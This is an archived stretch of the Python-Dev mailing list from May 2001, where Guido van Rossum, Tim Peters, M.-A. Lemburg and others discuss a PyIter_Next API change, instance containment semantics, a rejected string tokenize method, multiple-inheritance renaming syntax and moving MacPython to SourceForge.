-- 
Greg Ward - Unix bigot                                  gward at python.net
http://starship.python.net/~gward/
I hope something GOOD came in the mail today so I have a REASON to live!!


From guido at digicool.com  Fri May  4 20:36:14 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:36:14 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT."
             <20010504141244.A1167@gerg.ca> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>  
            <20010504141244.A1167@gerg.ca> 
Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com>

> On 03 May 2001, Paul F. Dubois said:
> > 1. The simple case, X inherits from Y and in defining foo and bar needs to
> > use Y's version:
> > 
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):

[Greg Ward]
> Maybe I'm being thick, but don't you get the same effect by doing this:
> 
> class X (Y):
>     _sfoo = Y.foo
>     _sbar = Y.bar
> 
> ...or would the "rename" syntax also hide the "foo" and "bar" names from
> X's effective namespace[1]?  In that case, I guess some special syntax
> is needed.

Paul's point is that the rename thing makes it possible to deprecate
the form Y.foo, which is causing the basic ambiguity here.

> [1] "effective namespace" -- the union of X's class dict with all its
> superclass' dicts; not actually X's namespace, but the set of names you
> can use in X.  I think.  Err, whatever.

Probably irrelevant.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Fri May  4 20:38:06 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:38:06 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT."
             <20010504141551.B1167@gerg.ca> 
References: <3AF27088.DE495210@lemburg.com>  
            <20010504141551.B1167@gerg.ca> 
Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com>

> On 04 May 2001, M.-A. Lemburg said:
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> > 
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> > 
> > I like this method -- should I review the code and then check it in ?
> 
> I concur with /F: -1 because you can do it easily with re.split().

-1 also.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May  4 20:51:26 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 14:51:26 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>

[MAL]
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1 here.  Easily enough done via other means, and you just *know* different
people will want different variants of tokenization (e.g., nobody in their
right mind will want " two " coming back from that example, and, given that
it does, that it doesn't also return " three" is baffling).

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

+1 from me:  it's the other half of the existing .encode() method, and the
current lack of symmetry is icky.


From barry at digicool.com  Fri May  4 20:57:09 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Fri, 4 May 2001 14:57:09 -0400
Subject: [Python-Dev] Multiple inheritance
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
	<20010503131714.D21814@inetnebr.com>
Message-ID: <15090.64389.746625.331215@anthem.wooz.org>

>>>>> "JE" == Jeff Epler <jepler at inetnebr.com> writes:

    >> class X (Y rename foo as _sfoo, bar as _sbar ):

    | Why not let us spell this as:
    | 	class X(Y):
    | 		from Y import foo as _sfoo, bar as _sbar
    | 		...

>>>>> "NS" == Neil Schemenauer <nas at python.ca> writes:

    NS> This already has a meaning in Python.  Paul's suggested syntax
    NS> is pretty neat, IMHO.

Not if Y is a class though, right?  That would currently raise an
ImportError, so why not hijack it for this purpose?  I think it has a
natural and clear enough meaning without requiring additional
keywords, or complicating the base class specification syntax.

-Barry


From tim.one at home.com  Fri May  4 22:50:03 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 16:50:03 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>

In spare moments, I've been plugging away at making various functions work
nice with iterators (map, min, max, etc).

Over and over this requires writing code of the form:

	op2 = PyIter_Next(it);
	if (op2 == NULL) {
		/* StopIteration is *implied* by a NULL return from
		 * PyIter_Next() if PyErr_Occurred() is false.
		 */
		if (PyErr_Occurred()) {
			if (PyErr_ExceptionMatches(PyExc_StopIteration))
				PyErr_Clear();
			else
				goto Fail;
		}
		break;
	}

This is wordy, obscure, and in my experience is needed every time I call
PyIter_Next().

So I'd like to hide this in PyIter_Next instead, like so:

/* Return next item.
 * If an error occurs, return NULL and set *error=1.
 * If the iteration terminated normally, return NULL and set *error=0.
 * Else return the next object and set *error=0.
 */
PyObject *
PyIter_Next(PyObject *iter, int *error)
{
	PyObject *result;
	if (!PyIter_Check(iter)) {
		PyErr_Format(PyExc_TypeError,
			     "'%.100s' object is not an iterator",
			     iter->ob_type->tp_name);
		*error = 1;
		return NULL;
	}
	result = (*iter->ob_type->tp_iternext)(iter);
	*error = 0;
	if (result)
		return result;
	if (PyErr_Occurred()) {
		if (PyErr_ExceptionMatches(PyExc_StopIteration))
			PyErr_Clear();
		else
			*error = 1;
	}
	/* Else StopIteration is implicit, and there is no error. */
	return NULL;
}

Then *calls* could be the simpler:

	op2 = PyIter_Next(it, &error);
	if (op2 == NULL) {
		if {error)
			goto Fail;
		break;
	}

Objections?  So far I'm almost the only user of PyIter_Next(); the only other
use is in ceval's FOR_ITER, which goes thru a similar dance.

However, I'm not clear on why FOR_ITER doesn't clear the exception if
PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
true -- that sure smells like a bug (but, if so, the change above would
squash it by magic).

Note that I'm not proposing to change the signature of the tp_iternext slot
similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.


From guido at digicool.com  Sat May  5 00:03:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 17:03:36 -0500
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400."
             <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com> 
Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>

> In spare moments, I've been plugging away at making various functions work
> nice with iterators (map, min, max, etc).

For which efforts I extend my greatest thanks!

> Over and over this requires writing code of the form:
> 
[etc.]
> 
> This is wordy, obscure, and in my experience is needed every time I call
> PyIter_Next().
> 
> So I'd like to hide this in PyIter_Next instead, like so:
> 
> /* Return next item.
>  * If an error occurs, return NULL and set *error=1.
>  * If the iteration terminated normally, return NULL and set *error=0.
>  * Else return the next object and set *error=0.
>  */
> PyObject *
> PyIter_Next(PyObject *iter, int *error)
> {
[etc.]
> }

> Then *calls* could be the simpler:
> 
> 	op2 = PyIter_Next(it, &error);
> 	if (op2 == NULL) {
> 		if {error)
> 			goto Fail;
> 		break;
> 	}

I originally had this API for tp_iternext, and changed it to the
current API because I got tired of having to declare the error
variable.

How about making PyIter_Next() call PyErr_Clear() when the exception
is StopIteration?

Then calls could be

    op2 = PyIter_Next(it);
    if (op2 == NULL) {
        if (PyErr_Occurred())
            goto Fail;
        break;
    }

This is a tad slower and arguably generates more code (assuming an
extra call is slower than passing an extra argument and loading it)
but doesn't require declaring the error variable.

But since you're the customer, it's your choice.

> Objections?  So far I'm almost the only user of PyIter_Next(); the only other
> use is in ceval's FOR_ITER, which goes thru a similar dance.
> 
> However, I'm not clear on why FOR_ITER doesn't clear the exception if
> PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
> true -- that sure smells like a bug (but, if so, the change above would
> squash it by magic).

Smells like a bug indeed.

> Note that I'm not proposing to change the signature of the tp_iternext slot
> similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May  4 23:18:16 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 17:18:16 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFMKAAA.tim.one@home.com>

[Tim]
>> In spare moments, I've been plugging away at ... iterators

[Guido]
> For which efforts I extend my greatest thanks!

Yet but a pale reflection of the thanks I extend to you for implementing
these guys to begin with:  they're *loads* of fun!  But not nearly as much
fun as playing with Perl, so they're still prudently Pythonic <wink>.

[T proposed adding a int* error arg to PyIter_Next()]

[G]
> How about making PyIter_Next() call PyErr_Clear() when the exception
> is StopIteration?
>
> Then calls could be
>
>     op2 = PyIter_Next(it);
>     if (op2 == NULL) {
>         if (PyErr_Occurred())
>             goto Fail;
>         break;
>     }

Perfect.  I'll do that later tonight, and update the PEP to match.

> This is a tad slower and arguably generates more code (assuming an
> extra call is slower than passing an extra argument and loading it)
> but doesn't require declaring the error variable.

Well, it's two more calls (since PyErr_Occurred() also makes a call to get
the thread state), but I don't really care because the client only does this
in case of error or end-of-iteration (which aren't the normal cases).  I was
dreading finding a spare int var to pass inside FOR_ITER anyway <wink>.


From paulp at ActiveState.com  Sat May  5 02:03:05 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Fri, 04 May 2001 17:03:05 -0700
Subject: [Python-Dev] ::
Message-ID: <3AF34339.9C553704@ActiveState.com>

I'll throw out a partially formed thought in case it is useful to
anybody.

"::" might be useful to solve another problem I've been struggling with:
how to have multiple package distributions share a namespace
(xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). 

"::" might mean, in general, that you are walking through abstract,
potentially merged namespaces and not through concrete dictionary
implementations. I think that Python's using the same syntax for package
namespaces and attribute accesses might seem more elegant than it is in
practice. Things that "seem like" they should work do not because
packages are fundamentally different than attributes:

>>> from xml import dom.minidom
  File "<stdin>", line 1
    from xml import dom.minidom
                       ^
SyntaxError: invalid syntax

Why isn't this symmetric? I would like to use "." on either side of the
import

>>> import xml
>>> print xml.dom
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: 'xml' module has no attribute 'dom'
>>> from xml.dom import minidom
>>> print xml.dom
<module 'xml.dom' from 'c:\program
files\python21\lib\xml\dom\__init__.pyc'>

I find it a little bit weird that importing one module has the side
effect of populating a package.
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido at digicool.com  Sat May  5 05:07:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 22:07:56 -0500
Subject: [Python-Dev] ::
In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST."
             <3AF34339.9C553704@ActiveState.com> 
References: <3AF34339.9C553704@ActiveState.com> 
Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com>

> I find it a little bit weird that importing one module has the side
> effect of populating a package.

That's just because you've seen too much Java. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Sat May  5 10:13:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 05 May 2001 10:13:30 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>
Message-ID: <3AF3B62A.50DD4115@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1 here.  Easily enough done via other means, and you just *know* different
> people will want different variants of tokenization (e.g., nobody in their
> right mind will want " two " coming back from that example, and, given that
> it does, that it doesn't also return " three" is baffling).

Ok. I rejected the patch with a mild response to take on this by
subclassing strings in Python 2.2 ;-)

> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> +1 from me:  it's the other half of the existing .encode() method, and the
> current lack of symmetry is icky.

Right.

If I here no strong objections, I'll check in the .decode()
method next week.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Sat May  5 13:45:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 06:45:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200."
             <3AF0662D.48671B4E@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>  
            <3AF0662D.48671B4E@lemburg.com> 
Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com>

> I've attached the patch. Due to a small reorganisation the
> patch is a little longer -- symmetry has its price at C level
> too ;-)

Looks good on paper, so go ahead and check it in.  Watch out for
potential changes caused by Tim's iter-crusade!  :-)

While you're at it, why don't you check in the rot13 codec you posted
-- it's good to have simle examples in the standard library.
It would also be cool to have codecs for common file encodings like
base64, quoted-printable, binhex, uuencode, and even hex
(binascii.hexlify).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Sat May  5 14:15:52 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:15:52 -0500
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200."
             <3AF3B62A.50DD4115@lemburg.com> 
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>  
            <3AF3B62A.50DD4115@lemburg.com> 
Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com>

> Ok. I rejected the patch with a mild response to take on this by
> subclassing strings in Python 2.2 ;-)

Gustavo didn't take the rejection well.  He contacted me asking for a
better explanation, and we got into a bit of an argument about how
much I must explain my decisions, but I think hge understands now.

> If I here no strong objections, I'll check in the .decode()
> method next week.

Yes, see my previous reply.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Sat May  5 14:24:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:24:19 -0500
Subject: [Python-Dev] PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST."
             <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net> 
References: <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net> 
Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>

In a checkin message, Tim wrote:
> The full story for instance objects is pretty much unexplainable, because
> instance_contains() tries its own flavor of iteration-based containment
> testing first, and PySequence_Contains doesn't get a chance at it unless
> instance_contains() blows up.  A consequence is that
>     some_complex_number in some_instance
> dies with a TypeError unless some_instance.__class__ defines __iter__ but
> does not define __getitem__.

This kind of thing happens everywhere -- instances always define all
slots but using the slots sometimes fails when the corresponding
__foo__ doesn't exist.  Decisions based on the presence or absence of
a slot are therefore in general not reliable; the only exception is
the decision to *call* the slot or not.  The correct solution is not
to catch AttributeError and pretend that the slot didn't exist (which
would mask an AttributeError occurring inside the __contains__ method
if there was one), but to reimplement the default behavior in the
instance slot implementation.

In this case, that means that PySequence_Contains() can be simplified
(no need to test for AttributeError), and instance_contains() should
fall back to a loop over iter(self) rather than trying to use
instance_item().

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 22:40:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 16:40:11 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>

[Guido]
> This kind of thing happens everywhere -- instances always define all
> slots but using the slots sometimes fails when the corresponding
> __foo__ doesn't exist.  Decisions based on the presence or absence of
> a slot are therefore in general not reliable; the only exception is
> the decision to *call* the slot or not.  The correct solution is not
> to catch AttributeError and pretend that the slot didn't exist (which
> would mask an AttributeError occurring inside the __contains__ method
> if there was one),

Ya, it sucks.  I was inspired by that instance_contains() itself makes
dubious assumptions about what an AttributeError means when the functions
*it* calls raise it <wink>.

> but to reimplement the default behavior in the instance slot
> implementation.

The "backward compatibility" comment in instance_contains() was scary:
compatibility with *what*?  instance_contains() is pretty darn new.  I
assumed it meant there was *some* good (but unidentified) reason we had to
use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
instance_item() "worked".  But I haven't thought of one, except to ensure
that

    some_complex  in  some_instance_with___getitem__

continues to blow up -- but that's not a good reason.  So:

> In this case, that means that PySequence_Contains() can be simplified
> (no need to test for AttributeError), and instance_contains() should
> fall back to a loop over iter(self) rather than trying to use
> instance_item().

Will do!


From guido at digicool.com  Sat May  5 23:48:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 16:48:33 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400."
             <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com> 
Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>

> [Guido]
> > This kind of thing happens everywhere -- instances always define all
> > slots but using the slots sometimes fails when the corresponding
> > __foo__ doesn't exist.  Decisions based on the presence or absence of
> > a slot are therefore in general not reliable; the only exception is
> > the decision to *call* the slot or not.  The correct solution is not
> > to catch AttributeError and pretend that the slot didn't exist (which
> > would mask an AttributeError occurring inside the __contains__ method
> > if there was one),

[Tim]
> Ya, it sucks.  I was inspired by that instance_contains() itself makes
> dubious assumptions about what an AttributeError means when the functions
> *it* calls raise it <wink>.

Actually, instance_contains checks for AttributeError only after
calling instance_getattr(), whose only purpose is to return the
requested attribute or raise AttributeError, so here it is safe: the
__contains__ function hasn't been called yet.

> > but to reimplement the default behavior in the instance slot
> > implementation.
> 
> The "backward compatibility" comment in instance_contains() was scary:
> compatibility with *what*?

With previous behavior of 'x in instance'.  Before we had
__contains__, 'x in y' *always* iterated over the items of y as a
sequence, comparing them to x one at a time.  The loop does that.

> instance_contains() is pretty darn new.  I
> assumed it meant there was *some* good (but unidentified) reason we had to
> use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
> instance_item() "worked".

No, that was probably just an oversight -- clearly it should have used
rich comparisons.  (I guess this is a disadvantage of the approach I'm
recommending here: if the default behavior changes, the
reimplementation of the default behavior in the class must be changed
too.)

> But I haven't thought of one, except to ensure
> that
> 
>     some_complex  in  some_instance_with___getitem__
> 
> continues to blow up -- but that's not a good reason.

Indeed not.

> So:
> 
> > In this case, that means that PySequence_Contains() can be simplified
> > (no need to test for AttributeError), and instance_contains() should
> > fall back to a loop over iter(self) rather than trying to use
> > instance_item().
> 
> Will do!

Thanks!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 23:24:58 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 17:24:58 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>

[Guido]
> Actually, instance_contains checks for AttributeError only after
> calling instance_getattr(), whose only purpose is to return the
> requested attribute or raise AttributeError, so here it is safe: the
> __contains__ function hasn't been called yet.

I'd say "safer", but not "safe":  at that point we only know that *some*
attribute didn't exist, somewhere, while attempting to look up
"__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
hook, like

    def __getattr__(self, attr):
        return global_resolver.resolve(self, attr)

where global_resolver has lost its "resolve" attr.  "except" clauses aren't
more bulletproof in C than in Python <0.9 wink>.

> With previous behavior of 'x in instance'.  Before we had
> __contains__, 'x in y' *always* iterated over the items of y as a
> sequence, comparing them to x one at a time.

I don't believe I ever knew that!  Thanks.  I erronesouly assumed that the
looping behavior was *introduced* when __contains__ was added.

> ...
> No, that was probably just an oversight -- clearly it should have used
> rich comparisons.  (I guess this is a disadvantage of the approach I'm
> recommending here: if the default behavior changes, the
> reimplementation of the default behavior in the class must be changed
> too.)

I factored out the new iterator-based __contains__ logic into a new private
API function, called when appropriate by both PySequence_Contains() and
instance_contains().  So any future changes to what iterator-based
__contains__ means will only need to be made in one place.

too-easy<wink>-ly y'rs  - tim


From guido at digicool.com  Sun May  6 00:31:05 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 17:31:05 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400."
             <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com> 
Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>

> [Guido]
> > Actually, instance_contains checks for AttributeError only after
> > calling instance_getattr(), whose only purpose is to return the
> > requested attribute or raise AttributeError, so here it is safe: the
> > __contains__ function hasn't been called yet.

[Tim]
> I'd say "safer", but not "safe":  at that point we only know that *some*
> attribute didn't exist, somewhere, while attempting to look up
> "__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
> hook, like
> 
>     def __getattr__(self, attr):
>         return global_resolver.resolve(self, attr)
> 
> where global_resolver has lost its "resolve" attr.  "except" clauses aren't
> more bulletproof in C than in Python <0.9 wink>.

Yes, but attribute errors inside __getattr__ hooks are *always* a
problem to debug, since raising AttributeError is part of its job.  So
this is not new.  I should have said "as safe as it gets."

> > With previous behavior of 'x in instance'.  Before we had
> > __contains__, 'x in y' *always* iterated over the items of y as a
> > sequence, comparing them to x one at a time.
> 
> I don't believe I ever knew that!  Thanks.  I erronesouly assumed that the
> looping behavior was *introduced* when __contains__ was added.

Surely you knew that "x in y" looped over the items of y?  What else
could it have done?  It was only defined on sequences!

> > ...
> > No, that was probably just an oversight -- clearly it should have used
> > rich comparisons.  (I guess this is a disadvantage of the approach I'm
> > recommending here: if the default behavior changes, the
> > reimplementation of the default behavior in the class must be changed
> > too.)
> 
> I factored out the new iterator-based __contains__ logic into a new private
> API function, called when appropriate by both PySequence_Contains() and
> instance_contains().  So any future changes to what iterator-based
> __contains__ means will only need to be made in one place.

Cool.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 23:53:51 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 17:53:51 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHHKAAA.tim.one@home.com>

[Guido]
> ...
> Surely you knew that "x in y" looped over the items of y?  What else
> could it have done?  It was only defined on sequences!

What's a sequence <wink>?  I expect I assumed that enduring a Python method
call for every element of an *instance* was so expensive that Python didn't
bother implementing "in" for instances (just for builtin sequences like lists
and strings etc).  I *know* I assumed it was so expensive that I never tried
it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting
"if x in s" where s was a tuple, list or string of length no more than 4; for
anything bigger I always used a dict or bisect).  So it's a personal blind
spot likely due to never looking in that direction.


From paul at pfdubois.com  Sun May  6 03:10:37 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Sat, 5 May 2001 18:10:37 -0700
Subject: [Python-Dev] multiple inheritance -- what I meant
Message-ID: <ADEOIFHFONCLEEPKCACCKEPMCIAA.paul@pfdubois.com>

When I suggested a modification to the inheritance clause,

class X (Y rename a as b, c as d, Z rename foo as bar):

someone suggested this was the same as

class X (Y, Z):
    b = Y.a
    d = Y.c
    bar = Z.foo

I meant two things by my suggestion:

1. I meant that Y.a would never be found when searching for X.a.

In particular, if Z.a exists, and a is not explicity defined in X, X.a is
Z.a.

2. More philosophically, rather than being a consequence of the language
like the second method is, the proposed syntax is intended to be a clear
message to someone reading the class about how the inherited names are being
handled. Compare the effort required of a reader to understand these two.
(If you think the second one is easier, you probably attended Spam III.)

If you can rename in this way there are no problems with multiple
inheritance.

To be complete you should probably also allow

Y undefine x, ...

which simply makes Y.x unavailable from X.


From Greg.Wilson at baltimore.com  Sun May  6 18:26:00 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Sun, 6 May 2001 12:26:00 -0400 
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>

Has anyone else found themselves wanting a method that
chooses and returns a dictionary element at random, without
removing it (as popitem does)?  Or is there some way to
tell popitem to return a value without mutating the container?
If neither, would this be useful, or is it DHG?

Thanks
Greg


From tim.one at home.com  Sun May  6 20:15:57 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 6 May 2001 14:15:57 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>

[Greg Wilson]
> Has anyone else found themselves wanting a method that
> chooses and returns a dictionary element at random,

Do you mean "random" or "arbitrary"?  "random" means every dict entry is
equally likely to be chosen; "arbitrary" means nothing is defined about the
result (except that it *is* a dict entry).  random is much more expensive to
implement (under the covers it's a vector, but a vector with holes, so you
can't just pick a *slot* at random then "slide over" to the first non-hole
(else a given entry's chance of being selected would be proportional to the #
of contiguous holes adjacent to it)).

> without removing it (as popitem does)?

Note that, in the sense above, popitem() returns an arbitrary element.

> Or is there some way to tell popitem to return a value without
> mutating the container?

No.  Easy to write an efficient function that does, though:

def arb(dict):
    k, v = pair = dict.popitem()
    dict[k] = v  # restore the entry
    return pair

Given the new dict iterators in 2.2, there's an easier fast way that doesn't
mutate the dict even under the covers:

def arb(dict):
    if dict:
        return dict.iteritems().next()
    raise KeyError("arb passed an empty dict")

> If neither, would this be useful, or is it DHG?

Do you have a particular algorithm, or class of algorithms, in mind for which
it is useful?  popitem's current behavior is most useful for me in the set
algorithms I've used, usually in the form:

    while working_set:
        x, dontcare = working_set.popitem()
        process(x)  # which may add more elts to working_set


From jack at oratrix.nl  Mon May  7 11:39:43 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:39:43 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl>

Folks,
now that there's finally a decent (well, somewhat decent:-) Mac CVS client 
that supports ssh I'd like to move MacPython to sourceforge. There's two ways 
I can go about this: start a new MacPython project or merge the MacPython 
stuff into the main Python CVS repository.

The Mac specific stuff for Python is all concentrated in a single subtree Mac 
of the main Python tree (the subtree has its own hierarchy of 
Python/Modules/Lib/etc directories), so putting it in the main repository 
should not pollute the filenamespace all that much. It would also have the 
advantage that a single "cvs update" would update everything (whereas the 
current situation for Mac developers, where Python/Mac is from a different 
CVSROOT than Python, does not have that advantage). The downside is that 
everyone who does a full checkout of the tree would get an extra 1000 or so 
files on their disk that are pretty useless unless they have a mac.

Oh yes, another plus for putting stuff in the main repository is MacOSX 
support. Some MacPython modules have been "ported" to MacOSX, and I've started 
on adding them to setup.py, and life would become a lot simpler for people 
compiling on MacOSX if they had everything available automatically.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack at oratrix.nl  Mon May  7 11:45:59 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:45:59 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core
Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl>

To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
of Python does not allow for an easy addition of a platform-dependent 
sourcefile to the core interpreter (or am I missing something?). This is a bit 
of functionality I need to port the various Mac modules to MacOSX-python. The 
platform depende sourcefile has various glue routines for turning MacOS error 
codes into exceptions and that sort of stuff.

Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack at oratrix.nl  Mon May  7 11:49:17 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:49:17 +0200
Subject: [Python-Dev] Need a search path for modules in setup.py
Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl>

(Don't worry, this is the last in my flurry of OSX related messages:-)

Life would be a lot simpler for me if setup.py (the one for the main extension 
modules) would have a search path for module sourcefiles. As Mac modules 
currently live in Python/Mac/Modules (as opposed to Python/Modules) not having 
a search path measn I get ugly "../Mac/Modules/foomodule.c" constructs.

I have the code for setup.py ready, is it OK if I check it in?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


